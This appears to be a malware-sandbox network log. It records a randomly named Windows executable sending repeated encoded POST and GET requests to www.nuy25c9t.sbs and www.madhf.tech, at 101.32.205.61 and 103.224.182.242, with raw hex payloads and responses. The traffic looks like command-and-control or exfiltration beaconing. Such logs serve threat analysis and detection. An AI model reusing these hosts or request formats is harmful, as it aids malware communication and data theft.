Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:36:22.063112974 CET	1846	OUT	POST /lmj1/ HTTP/1.1 Host: www.nuy25c9t.sbs Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 1248 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.nuy25c9t.sbs Referer: http://www.nuy25c9t.sbs/lmj1/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0) Data Raw: 34 30 47 3d 45 77 46 52 66 64 34 71 34 5a 4e 50 4d 39 57 41 77 37 63 6c 41 51 4c 41 65 45 59 46 74 59 77 2f 49 51 71 4a 50 58 35 48 38 7a 36 30 59 79 6a 6f 30 48 38 70 41 71 44 35 4b 45 4c 59 65 70 64 65 6a 53 4a 4c 44 4a 39 56 54 42 74 73 50 34 63 30 73 30 7a 58 58 77 47 70 47 42 62 76 70 64 5a 6c 63 50 38 61 6d 54 73 73 52 59 78 51 65 65 41 4e 39 7a 65 4c 74 48 35 7a 61 2f 5a 6b 6c 38 67 43 79 46 43 44 30 56 7a 6c 42 57 67 5a 7a 4c 78 64 4c 73 63 73 4f 6b 62 42 64 57 43 4c 51 68 71 61 39 54 45 73 69 67 67 77 4f 55 41 75 6e 70 42 4c 36 5a 6b 39 6e 65 6b 48 45 43 74 45 4b 39 4c 53 67 6a 54 4a 4a 2b 59 57 6a 44 35 38 54 55 51 53 4e 77 61 72 5a 2f 76 72 6b 65 6b 69 64 76 52 61 76 4c 70 79 32 7a 48 62 6d 35 79 78 35 39 4f 73 36 38 62 46 36 59 69 53 47 51 48 65 2b 77 30 2f 41 36 32 4d 46 76 35 33 61 2b 53 37 4c 77 33 48 46 6f 49 36 4f 70 51 6c 48 32 54 62 50 34 58 6c 58 76 52 48 76 35 48 34 72 74 76 37 4a 71 65 35 6c 42 6d 42 70 32 56 6a 4b 55 63 64 34 75 51 49 68 57 41 48 36 2b 61 4d 78 70 57 42 54 38 [TRUNCATED] Data Ascii: 40G=EwFRfd4q4ZNPM9WAw7clAQLAeEYFtYw/IQqJPX5H8z60Yyjo0H8pAqD5KELYepdejSJLDJ9VTBtsP4c0s0zXXwGpGBbvpdZlcP8amTssRYxQeeAN9zeLtH5za/Zkl8gCyFCD0VzlBWgZzLxdLscsOkbBdWCLQhqa9TEsiggwOUAunpBL6Zk9nekHECtEK9LSgjTJJ+YWjD58TUQSNwarZ/vrkekidvRavLpy2zHbm5yx59Os68bF6YiSGQHe+w0/A62MFv53a+S7Lw3HFoI6OpQlH2TbP4XlXvRHv5H4rtv7Jqe5lBmBp2VjKUcd4uQIhWAH6+aMxpWBT8GI6/3c3PEiMRMGM7SNhMr/6HhREXrt9k6u47yBKU7HYnmkWdgWxgxEo/lV6Lx46byo1UZD/u7GJ/lfz42QXmT/G+O+bMZD9Q2lZJWmn/97n7hV5JJEGNSTsI7JRevjipaX38uCyTFFkk+QZpG8g1JygSKzv99gl2B/Y1a9tTZPZCAbUHHSceXN7QYe6jWV2PgMplZJ1rLCZbnNo7KJwjsqH0sA4yJQK+28agpuAAtfDS7ePXIetN0uQl/qwxjB/ApFiIcwMWgIKLoRKwioKyQpHUCNuZJe4lcmvhwxAPI0w1sSv2nL8okNHyiZkNRI623L5vkMOhbwAjHyR2Ktg4Isr5XFQgVw0FZEwNJaTtEkNF1Q3rVlw0EUL/ceaTSooEZXu6CafSXz664fmD2JTPF6t35pQScPR6pasq5uiRTL9i1TF4CpA5A17yUWsF5RRum1u27D/MBEkl690r/ltH5kRfjX/7Y5HVuonvAoyrIAvUOIKAFMV8myVylzKws9WdUsd3JW9s+wumZBBy9VAzQncNW0cuhHXow971FsPbeux5Uctv8TuY9uqnLKsoLKurL5spB2zhiEGyGDO462Wyt+5hvNa4uVLRwPr1UTmsKa3bb1Ty1JYJgsqiH4qHsGLvEQMv4FWB30QcJ98dkKtKLyT/x0yCQxG1iy [TRUNCATED]
Jan 11, 2025 09:36:22.963481903 CET	708	IN	HTTP/1.1 404 Not Found Server: Tengine Date: Sat, 11 Jan 2025 08:36:22 GMT Content-Type: text/html; charset=utf-8 Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.7	50000	101.32.205.61	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:36:24.609390974 CET	544	OUT	GET /lmj1/?40G=JytxcoExloxtM9GYw/YkVBPtQn8SsYRrRxOyYElJ8zmzZDKm1RUtP4/aN3HHeJpfiiM3EsU/TmM7ebohnljNLh6aJBXcpKJnc7knxQojZ5lwIpUW+gGYnH9DbcZ+0LQDmlqLzGDTRmoL&I6=x8CX HTTP/1.1 Host: www.nuy25c9t.sbs Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Jan 11, 2025 09:36:25.486968040 CET	708	IN	HTTP/1.1 404 Not Found Server: Tengine Date: Sat, 11 Jan 2025 08:36:25 GMT Content-Type: text/html; charset=utf-8 Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.7	50001	103.224.182.242	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:36:31.463869095 CET	807	OUT	POST /vpqb/ HTTP/1.1 Host: www.madhf.tech Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 216 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.madhf.tech Referer: http://www.madhf.tech/vpqb/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0) Data Raw: 34 30 47 3d 76 66 69 2b 66 55 6e 38 33 30 77 71 46 68 6f 6f 59 71 39 32 43 41 37 47 54 39 43 33 5a 31 62 79 62 44 37 4f 71 6e 2b 30 6f 7a 6b 4e 67 42 70 47 6e 6c 4b 41 51 4d 57 6b 43 73 59 6c 58 6f 4c 43 71 70 7a 74 62 4d 61 41 52 43 35 6a 55 64 50 32 79 70 65 67 79 72 30 41 39 68 4f 65 59 4f 48 68 72 69 65 71 42 63 4a 41 50 61 73 65 4b 56 43 6b 4c 4d 59 6e 54 42 2f 4e 6e 47 5a 75 44 6a 47 30 49 2f 65 79 37 5a 39 54 48 34 4b 6f 51 74 61 6a 74 78 37 4e 61 4f 73 4b 4d 4c 6a 57 2b 2b 53 79 6d 66 61 62 56 63 69 50 79 77 54 74 74 6a 45 57 74 49 41 71 57 75 34 70 52 72 69 6f 74 51 46 38 64 66 74 49 64 67 66 62 4d 72 4e 38 6e 41 61 4a 6b 77 3d 3d Data Ascii: 40G=vfi+fUn830wqFhooYq92CA7GT9C3Z1bybD7Oqn+0ozkNgBpGnlKAQMWkCsYlXoLCqpztbMaARC5jUdP2ypegyr0A9hOeYOHhrieqBcJAPaseKVCkLMYnTB/NnGZuDjG0I/ey7Z9TH4KoQtajtx7NaOsKMLjW++SymfabVciPywTttjEWtIAqWu4pRriotQF8dftIdgfbMrN8nAaJkw==
Jan 11, 2025 09:36:32.044764996 CET	871	IN	HTTP/1.1 200 OK date: Sat, 11 Jan 2025 08:36:31 GMT server: Apache set-cookie: __tad=1736584591.3456751; expires=Tue, 09-Jan-2035 08:36:31 GMT; Max-Age=315360000 vary: Accept-Encoding content-encoding: gzip content-length: 576 content-type: text/html; charset=UTF-8 connection: close Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 11 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 5b 72 25 26 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 39 12 15 5e 39 dd 13 d0 b1 47 11 13 de 53 be 91 7b 79 8e c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 cf d8 d7 52 95 d1 5e 3a 70 58 69 87 8a 7e b6 da 6c 41 40 d2 10 f5 8b 3c 3f 1c 0e d9 b3 ba 7c df df ad f2 0f c9 32 8a f2 1c 6e 91 40 02 e9 0e ed 8e c0 d6 30 9f cd a0 d3 ca 59 8f ca 9a ca 03 59 c0 7b 54 3b 42 06 3e 96 00 5d 03 35 08 2f 94 43 ef 6c a7 3d c7 a4 6e 3d d4 d6 81 b7 1d 32 45 7a 6b a2 7a 67 14 69 6b f8 b8 6d 57 52 6d 6f c6 54 e9 14 1e a2 c9 41 9b ca 1e b2 d6 2a 19 50 99 c3 be 95 0a d3 df 3c 5d 26 75 2f ae de 27 d3 65 74 8a 22 72 c7 c0 64 95 9e c0 55 ee fb 68 42 80 47 1a 37 e9 9f d5 de 04 83 cc 9f 84 86 d5 fd b7 51 b3 80 4f cf 4e be dc b2 0e 59 a5 0f 9d 35 9a 2c 87 d6 8b 20 db e3 29 30 9f 58 [TRUNCATED] Data Ascii: TMo0=pvNl;a"[r%&iPrm:]lQeb3B9^9GS{yqy]\NlR^:pXi~lA@<?\|2n@0YY{T;B>]5/Cl=n=2EzkzgikmWRmoTAP<]&u/'et"rdUhBG7QONY5, )0XdqLZ JL2qw-:bS-GKUM;]}9rt)kgwZ\\ieu"CXZTzW$c.8?7L<)?ZmABW/nr+w(~\|U}Sbv,_Cz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.7	50002	103.224.182.242	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:36:34.171109915 CET	827	OUT	POST /vpqb/ HTTP/1.1 Host: www.madhf.tech Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 236 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.madhf.tech Referer: http://www.madhf.tech/vpqb/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0) Data Raw: 34 30 47 3d 76 66 69 2b 66 55 6e 38 33 30 77 71 46 41 59 6f 61 4a 6c 32 46 67 37 4a 50 74 43 33 58 6c 62 32 62 44 33 4f 71 6d 72 78 72 42 77 4e 68 6a 78 47 6d 6b 4b 41 65 73 57 6b 4a 4d 59 73 61 49 4c 56 71 70 76 4c 62 4d 32 41 52 44 64 6a 55 65 62 32 79 61 47 6a 7a 37 30 65 6b 78 4f 4c 46 2b 48 68 72 69 65 71 42 66 30 6c 50 61 6b 65 4b 41 53 6b 5a 2b 38 6b 4e 52 2f 4b 33 57 5a 75 48 6a 47 77 49 2f 65 41 37 59 77 32 48 2b 47 6f 51 73 71 6a 73 6b 62 4d 50 65 73 4d 50 37 69 67 37 4d 76 6e 69 65 4b 67 51 76 4f 68 32 42 58 73 73 56 46 30 33 71 4d 47 49 2f 41 53 56 70 47 65 36 32 59 4a 66 65 70 51 51 43 72 36 54 63 6f 57 71 53 37 4e 79 48 2f 2b 53 71 56 49 46 32 79 76 37 48 4d 69 51 75 75 44 38 47 4d 3d Data Ascii: 40G=vfi+fUn830wqFAYoaJl2Fg7JPtC3Xlb2bD3OqmrxrBwNhjxGmkKAesWkJMYsaILVqpvLbM2ARDdjUeb2yaGjz70ekxOLF+HhrieqBf0lPakeKASkZ+8kNR/K3WZuHjGwI/eA7Yw2H+GoQsqjskbMPesMP7ig7MvnieKgQvOh2BXssVF03qMGI/ASVpGe62YJfepQQCr6TcoWqS7NyH/+SqVIF2yv7HMiQuuD8GM=
Jan 11, 2025 09:36:34.658082962 CET	871	IN	HTTP/1.1 200 OK date: Sat, 11 Jan 2025 08:36:34 GMT server: Apache set-cookie: __tad=1736584594.5776761; expires=Tue, 09-Jan-2035 08:36:34 GMT; Max-Age=315360000 vary: Accept-Encoding content-encoding: gzip content-length: 576 content-type: text/html; charset=UTF-8 connection: close Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 11 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 5b 72 25 26 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 39 12 15 5e 39 dd 13 d0 b1 47 11 13 de 53 be 91 7b 79 8e c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 cf d8 d7 52 95 d1 5e 3a 70 58 69 87 8a 7e b6 da 6c 41 40 d2 10 f5 8b 3c 3f 1c 0e d9 b3 ba 7c df df ad f2 0f c9 32 8a f2 1c 6e 91 40 02 e9 0e ed 8e c0 d6 30 9f cd a0 d3 ca 59 8f ca 9a ca 03 59 c0 7b 54 3b 42 06 3e 96 00 5d 03 35 08 2f 94 43 ef 6c a7 3d c7 a4 6e 3d d4 d6 81 b7 1d 32 45 7a 6b a2 7a 67 14 69 6b f8 b8 6d 57 52 6d 6f c6 54 e9 14 1e a2 c9 41 9b ca 1e b2 d6 2a 19 50 99 c3 be 95 0a d3 df 3c 5d 26 75 2f ae de 27 d3 65 74 8a 22 72 c7 c0 64 95 9e c0 55 ee fb 68 42 80 47 1a 37 e9 9f d5 de 04 83 cc 9f 84 86 d5 fd b7 51 b3 80 4f cf 4e be dc b2 0e 59 a5 0f 9d 35 9a 2c 87 d6 8b 20 db e3 29 30 9f 58 [TRUNCATED] Data Ascii: TMo0=pvNl;a"[r%&iPrm:]lQeb3B9^9GS{yqy]\NlR^:pXi~lA@<?\|2n@0YY{T;B>]5/Cl=n=2EzkzgikmWRmoTAP<]&u/'et"rdUhBG7QONY5, )0XdqLZ JL2qw-:bS-GKUM;]}9rt)kgwZ\\ieu"CXZTzW$c.8?7L<)?ZmABW/nr+w(~\|U}Sbv,_Cz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.7	50003	103.224.182.242	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:36:36.791834116 CET	1840	OUT	POST /vpqb/ HTTP/1.1 Host: www.madhf.tech Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 1248 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.madhf.tech Referer: http://www.madhf.tech/vpqb/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0) Data Raw: 34 30 47 3d 76 66 69 2b 66 55 6e 38 33 30 77 71 46 41 59 6f 61 4a 6c 32 46 67 37 4a 50 74 43 33 58 6c 62 32 62 44 33 4f 71 6d 72 78 72 42 6f 4e 68 57 74 47 6e 48 69 41 64 73 57 6b 53 73 59 68 61 49 4c 74 71 70 6e 50 62 4d 4b 36 52 41 31 6a 56 2b 48 32 36 4c 47 6a 34 37 30 65 35 68 4f 66 59 4f 47 6c 72 69 4f 75 42 63 63 6c 50 61 6b 65 4b 48 71 6b 4f 38 59 6b 4b 68 2f 4e 6e 47 59 68 44 6a 47 59 49 2f 47 51 37 59 30 4d 48 4f 6d 6f 51 4d 36 6a 76 51 37 4d 53 75 73 4f 47 72 69 6f 37 4d 69 33 69 61 71 47 51 76 4b 4c 32 44 58 73 75 44 73 6a 71 59 77 34 58 39 51 4e 55 71 6d 62 35 55 49 44 59 63 34 70 50 52 79 65 65 63 6f 5a 70 42 7a 75 2f 42 32 48 4d 35 56 39 44 6b 61 35 36 7a 78 34 4a 75 71 4c 70 79 4c 57 6c 49 6a 58 6d 50 48 4a 77 4f 53 6c 58 5a 41 6f 58 41 74 35 6d 7a 5a 6b 66 2b 63 47 4b 58 33 73 4d 58 54 36 46 4a 66 79 58 79 6d 5a 6f 41 36 63 6c 72 53 62 34 39 32 42 44 50 49 4c 38 34 34 6e 2f 31 2b 2b 75 50 56 65 43 65 31 4c 52 64 79 6c 79 67 54 4e 4f 30 42 4e 61 6e 7a 75 45 71 2f 78 4d 43 39 4a 31 57 [TRUNCATED] Data Ascii: 40G=vfi+fUn830wqFAYoaJl2Fg7JPtC3Xlb2bD3OqmrxrBoNhWtGnHiAdsWkSsYhaILtqpnPbMK6RA1jV+H26LGj470e5hOfYOGlriOuBcclPakeKHqkO8YkKh/NnGYhDjGYI/GQ7Y0MHOmoQM6jvQ7MSusOGrio7Mi3iaqGQvKL2DXsuDsjqYw4X9QNUqmb5UIDYc4pPRyeecoZpBzu/B2HM5V9Dka56zx4JuqLpyLWlIjXmPHJwOSlXZAoXAt5mzZkf+cGKX3sMXT6FJfyXymZoA6clrSb492BDPIL844n/1++uPVeCe1LRdylygTNO0BNanzuEq/xMC9J1W68PfMCzDwv/xX3jnKWNPsfY1U5CPfY/XQ3cpCI5kqINnxbvnvLa0FwmFxAuXdtG00zRZU4XSn8zORBnxqwhFUCKH8+hCLLMehfEVz45HQCs6IC4hE4duOWZAHNkg6S6ZKQ/96MsMIeRAX17LFYdVpH4JI0sCtVHWZWd31GUmUx09bP+ulTEhHGsbXpP87G/Gb3skE05iH5cYGjFGdEMaPsMVcr0zV1miv/cAfwv7gCsUYhrqsvX/3csFAQDJlFdOBfHB85dxeekB8N52BsSXqXumYecxbiIV0zes8lh1tOxBlHPIZ8IrUgg1ET8Qd1kwWGpBbp8LFokbV9XKusHtNsNgl/ScsIItPyo3yyYfka6mqQ5VblfomEEKAy1vcmtRJ9SZt3PICggEXnQZiEs5Lkyt8VX7op/hX0N1jnlIlIbg4IQPmdhQWL3h5ivkFpuJVkZO1v0pbhRNFW1YiMAChq0lhlcQiYLfghvIocSLqU6iSmMKiw0VuSM2Qvz1aBoSY7bSV8mTNYzyh0H7UCFq9l+hFlj+L6ouI89lJJ/1xWPPkjRojiwRGj/b5++2StKvn9XWGgdgFM6pd6nhJIyjl8XIygCZ6x11rfuTUH0t8T7Myk0T8hisUWNe9W5knyK3z+/fwQvYOuxVVTd7wmLNXsvMXhGN59cEXN [TRUNCATED]
Jan 11, 2025 09:36:37.435595989 CET	871	IN	HTTP/1.1 200 OK date: Sat, 11 Jan 2025 08:36:37 GMT server: Apache set-cookie: __tad=1736584597.8923379; expires=Tue, 09-Jan-2035 08:36:37 GMT; Max-Age=315360000 vary: Accept-Encoding content-encoding: gzip content-length: 576 content-type: text/html; charset=UTF-8 connection: close Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 11 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 5b 72 25 26 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 39 12 15 5e 39 dd 13 d0 b1 47 11 13 de 53 be 91 7b 79 8e c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 cf d8 d7 52 95 d1 5e 3a 70 58 69 87 8a 7e b6 da 6c 41 40 d2 10 f5 8b 3c 3f 1c 0e d9 b3 ba 7c df df ad f2 0f c9 32 8a f2 1c 6e 91 40 02 e9 0e ed 8e c0 d6 30 9f cd a0 d3 ca 59 8f ca 9a ca 03 59 c0 7b 54 3b 42 06 3e 96 00 5d 03 35 08 2f 94 43 ef 6c a7 3d c7 a4 6e 3d d4 d6 81 b7 1d 32 45 7a 6b a2 7a 67 14 69 6b f8 b8 6d 57 52 6d 6f c6 54 e9 14 1e a2 c9 41 9b ca 1e b2 d6 2a 19 50 99 c3 be 95 0a d3 df 3c 5d 26 75 2f ae de 27 d3 65 74 8a 22 72 c7 c0 64 95 9e c0 55 ee fb 68 42 80 47 1a 37 e9 9f d5 de 04 83 cc 9f 84 86 d5 fd b7 51 b3 80 4f cf 4e be dc b2 0e 59 a5 0f 9d 35 9a 2c 87 d6 8b 20 db e3 29 30 9f 58 [TRUNCATED] Data Ascii: TMo0=pvNl;a"[r%&iPrm:]lQeb3B9^9GS{yqy]\NlR^:pXi~lA@<?\|2n@0YY{T;B>]5/Cl=n=2EzkzgikmWRmoTAP<]&u/'et"rdUhBG7QONY5, )0XdqLZ JL2qw-:bS-GKUM;]}9rt)kgwZ\\ieu"CXZTzW$c.8?7L<)?ZmABW/nr+w(~\|U}Sbv,_Cz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.7	50004	103.224.182.242	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:36:39.348210096 CET	542	OUT	GET /vpqb/?40G=idKeckLAh2QIGB9KZJIRJS/oZMGdTwW1FjmI9FLM0wQU5zssjU3Tb8uAKfYmb7Pqyu/QfIKYZQgeFcPlwIuov6UF8iHhIIfztFuddsJZKZ0jfG27BsUoTTDkyVdJYgiWFcO05IwORcvR&I6=x8CX HTTP/1.1 Host: www.madhf.tech Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Jan 11, 2025 09:36:39.938246965 CET	1236	IN	HTTP/1.1 200 OK date: Sat, 11 Jan 2025 08:36:39 GMT server: Apache set-cookie: __tad=1736584599.6643184; expires=Tue, 09-Jan-2035 08:36:39 GMT; Max-Age=315360000 vary: Accept-Encoding content-length: 1511 content-type: text/html; charset=UTF-8 connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 6d 61 64 68 66 2e 74 65 63 68 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e 74 65 63 68 2f 76 70 71 62 2f 3f 34 30 47 3d 69 64 4b 65 63 6b 4c 41 68 32 51 49 47 42 39 4b 5a 4a 49 52 4a 53 2f 6f 5a 4d 47 64 54 77 57 31 46 6a 6d 49 39 46 4c 4d 30 77 51 55 35 7a 73 73 6a 55 33 54 62 38 75 41 4b 66 59 6d 62 37 50 71 79 75 2f 51 66 49 4b 59 5a 51 67 65 46 63 50 6c 77 49 75 6f 76 36 55 46 38 69 48 68 49 49 66 7a 74 46 75 64 64 73 4a 5a 4b 5a 30 6a 66 47 32 37 42 73 55 6f 54 54 44 6b 79 56 64 4a 59 67 69 57 46 63 4f 30 35 49 77 4f 52 63 [TRUNCATED] Data Ascii: <html><head><title>madhf.tech</title><script type="text/javascript" 